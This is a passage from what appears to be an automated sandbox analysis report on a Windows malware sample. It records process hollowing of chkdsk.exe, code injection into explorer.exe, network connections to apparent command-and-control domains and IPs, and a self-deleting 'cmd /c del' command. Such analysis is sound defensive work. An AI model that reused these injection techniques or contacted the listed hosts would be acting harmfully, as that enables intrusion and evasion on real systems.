          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05374BAD mov eax, dword ptr fs:[00000030h]11_2_05374BAD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05374BAD mov eax, dword ptr fs:[00000030h]11_2_05374BAD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05374BAD mov eax, dword ptr fs:[00000030h]11_2_05374BAD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05372397 mov eax, dword ptr fs:[00000030h]11_2_05372397
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05358794 mov eax, dword ptr fs:[00000030h]11_2_05358794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537B390 mov eax, dword ptr fs:[00000030h]11_2_0537B390
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C7794 mov eax, dword ptr fs:[00000030h]11_2_053C7794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C7794 mov eax, dword ptr fs:[00000030h]11_2_053C7794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C7794 mov eax, dword ptr fs:[00000030h]11_2_053C7794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05351B8F mov eax, dword ptr fs:[00000030h]11_2_05351B8F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05351B8F mov eax, dword ptr fs:[00000030h]11_2_05351B8F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053FD380 mov ecx, dword ptr fs:[00000030h]11_2_053FD380
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0540138A mov eax, dword ptr fs:[00000030h]11_2_0540138A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053837F5 mov eax, dword ptr fs:[00000030h]11_2_053837F5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053703E2 mov eax, dword ptr fs:[00000030h]11_2_053703E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053703E2 mov eax, dword ptr fs:[00000030h]11_2_053703E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053703E2 mov eax, dword ptr fs:[00000030h]11_2_053703E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053703E2 mov eax, dword ptr fs:[00000030h]11_2_053703E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053703E2 mov eax, dword ptr fs:[00000030h]11_2_053703E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053703E2 mov eax, dword ptr fs:[00000030h]11_2_053703E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536DBE9 mov eax, dword ptr fs:[00000030h]11_2_0536DBE9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05415BA5 mov eax, dword ptr fs:[00000030h]11_2_05415BA5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C53CA mov eax, dword ptr fs:[00000030h]11_2_053C53CA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C53CA mov eax, dword ptr fs:[00000030h]11_2_053C53CA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053FFE3F mov eax, dword ptr fs:[00000030h]11_2_053FFE3F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534E620 mov eax, dword ptr fs:[00000030h]11_2_0534E620
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05384A2C mov eax, dword ptr fs:[00000030h]11_2_05384A2C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05384A2C mov eax, dword ptr fs:[00000030h]11_2_05384A2C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534AA16 mov eax, dword ptr fs:[00000030h]11_2_0534AA16
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534AA16 mov eax, dword ptr fs:[00000030h]11_2_0534AA16
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05418A62 mov eax, dword ptr fs:[00000030h]11_2_05418A62
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05345210 mov eax, dword ptr fs:[00000030h]11_2_05345210
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05345210 mov ecx, dword ptr fs:[00000030h]11_2_05345210
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05345210 mov eax, dword ptr fs:[00000030h]11_2_05345210
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05345210 mov eax, dword ptr fs:[00000030h]11_2_05345210
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05363A1C mov eax, dword ptr fs:[00000030h]11_2_05363A1C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537A61C mov eax, dword ptr fs:[00000030h]11_2_0537A61C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537A61C mov eax, dword ptr fs:[00000030h]11_2_0537A61C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534C600 mov eax, dword ptr fs:[00000030h]11_2_0534C600
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534C600 mov eax, dword ptr fs:[00000030h]11_2_0534C600
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534C600 mov eax, dword ptr fs:[00000030h]11_2_0534C600
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05378E00 mov eax, dword ptr fs:[00000030h]11_2_05378E00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05358A0A mov eax, dword ptr fs:[00000030h]11_2_05358A0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0538927A mov eax, dword ptr fs:[00000030h]11_2_0538927A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536AE73 mov eax, dword ptr fs:[00000030h]11_2_0536AE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536AE73 mov eax, dword ptr fs:[00000030h]11_2_0536AE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536AE73 mov eax, dword ptr fs:[00000030h]11_2_0536AE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536AE73 mov eax, dword ptr fs:[00000030h]11_2_0536AE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536AE73 mov eax, dword ptr fs:[00000030h]11_2_0536AE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401608 mov eax, dword ptr fs:[00000030h]11_2_05401608
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535766D mov eax, dword ptr fs:[00000030h]11_2_0535766D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053FB260 mov eax, dword ptr fs:[00000030h]11_2_053FB260
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053FB260 mov eax, dword ptr fs:[00000030h]11_2_053FB260
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053D4257 mov eax, dword ptr fs:[00000030h]11_2_053D4257
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05349240 mov eax, dword ptr fs:[00000030h]11_2_05349240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05349240 mov eax, dword ptr fs:[00000030h]11_2_05349240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05349240 mov eax, dword ptr fs:[00000030h]11_2_05349240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05349240 mov eax, dword ptr fs:[00000030h]11_2_05349240
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05357E41 mov eax, dword ptr fs:[00000030h]11_2_05357E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05357E41 mov eax, dword ptr fs:[00000030h]11_2_05357E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05357E41 mov eax, dword ptr fs:[00000030h]11_2_05357E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05357E41 mov eax, dword ptr fs:[00000030h]11_2_05357E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05357E41 mov eax, dword ptr fs:[00000030h]11_2_05357E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05357E41 mov eax, dword ptr fs:[00000030h]11_2_05357E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535AAB0 mov eax, dword ptr fs:[00000030h]11_2_0535AAB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535AAB0 mov eax, dword ptr fs:[00000030h]11_2_0535AAB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537FAB0 mov eax, dword ptr fs:[00000030h]11_2_0537FAB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053452A5 mov eax, dword ptr fs:[00000030h]11_2_053452A5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_00409B50 LdrLoadDll,3_2_00409B50
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.216.2 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.seal-brother.com
          Source: C:\Windows\explorer.exeDomain query: www.kangrungao.com
          Source: C:\Windows\explorer.exeDomain query: www.healthyweekendtips.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.238.101 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.135.122 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.govindfinance.com
          Source: C:\Windows\explorer.exeNetwork Connect: 59.106.13.53 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.driventow.com
          Source: C:\Windows\explorer.exeNetwork Connect: 8.212.24.67 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.satellitephonstore.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: FD0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeMemory written: C:\Users\user\Desktop\2u2u8wnrrW.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeProcess created: C:\Users\user\Desktop\2u2u8wnrrW.exe C:\Users\user\Desktop\2u2u8wnrrW.exeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2u2u8wnrrW.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000000.400311391.0000000004F80000.00000004.00000001.sdmp, chkdsk.exe, 0000000B.00000002.621174519.0000000007940000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.398367465.0000000000EE0000.00000002.00020000.sdmp, chkdsk.exe, 0000000B.00000002.621174519.0000000007940000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.398367465.0000000000EE0000.00000002.00020000.sdmp, chkdsk.exe, 0000000B.00000002.621174519.0000000007940000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.398367465.0000000000EE0000.00000002.00020000.sdmp, chkdsk.exe, 0000000B.00000002.621174519.0000000007940000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Users\user\Desktop\2u2u8wnrrW.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
